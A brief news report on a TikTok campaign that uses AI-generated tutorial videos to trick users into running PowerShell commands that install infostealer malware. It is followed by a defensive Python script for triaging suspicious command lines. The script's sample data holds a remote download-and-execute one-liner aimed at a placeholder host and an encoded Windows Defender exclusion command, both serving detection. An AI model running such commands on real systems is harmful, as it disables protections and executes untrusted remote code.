TikTok Users Hit by AI Malware in Video Scam
Hackers are exploiting TikTok’s popularity to distribute information-stealing malware using AI-generated tutorial videos, according to researchers at Censys. The campaign targets users searching for pirated software by presenting convincing how-to videos that guide viewers through fake activation processes. Instead of legitimate instructions, the videos prompt users to run PowerShell commands that install malware such as Vidar and StealC.
The malicious content, some of which has amassed nearly 500,000 views, highlights a growing trend of AI-enhanced social engineering. The malware is distributed through a network of domains hosted by AS214196, a bulletproof hosting provider that promotes anonymous virtual servers with no KYC requirements.
The PowerShell-based infection uses obfuscation, base64 encoding, and evasion techniques to bypass Windows Defender and maintain persistence. Once installed, the malware hides in system folders and poses as a Windows Update service to avoid detection. The operation’s scale and sophistication mark a significant evolution in social media-driven cyber threats.
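A defender-side way to triage process command lines for the behaviour described above (base64-encoded PowerShell, Windows Defender changes, download-and-run). This is an added example, not code from Censys or the original article; the indicator names, the `Add-MpPreference`/`Set-MpPreference` check and the sample command lines are assumptions constructed for illustration.

```python
import base64
import re

# Any "-flag value" pair whose value looks like base64 (8+ chars, optional padding).
ARG = re.compile(r"\s-(\w+)\s+([A-Za-z0-9+/]{8,}={0,2})")
POWERSHELL = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")
DEFENDER = re.compile(r"(?i)\b(?:add|set)-mppreference\b")
EXECUTE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
FETCH = re.compile(r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b")

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (or an accepted abbreviation), else None."""
    for flag, blob in ARG.findall(cmdline):
        flag = flag.lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc, ...).
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:  # the argument is base64 over UTF-16LE text
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or not valid UTF-16LE
                return None
    return None

def triage(cmdline):
    """Return sorted indicator names (assumed labels) for one process command line."""
    if not POWERSHELL.search(cmdline):
        return []
    hits = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded_command")
    text = cmdline + "\n" + (decoded or "")  # inspect both the raw and decoded forms
    if DEFENDER.search(text):
        hits.add("defender_settings_change")
    if EXECUTE.search(text) and FETCH.search(text):
        hits.add("download_and_execute")
    return sorted(hits)

def _enc(script):  # builds a constructed -EncodedCommand argument for the samples
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLES = [  # constructed command lines, not taken from the campaign
    "powershell.exe -NoProfile -WindowStyle Hidden -enc "
    + _enc(r"Add-MpPreference -ExclusionPath C:\ProgramData\example"),
    'powershell -Command "iex (irm https://example.invalid/setup.ps1)"',
    "powershell.exe -NoProfile -Command Get-Date",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```

In practice the command lines would come from process-creation telemetry such as Windows Security event 4688 or Sysmon event 1.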
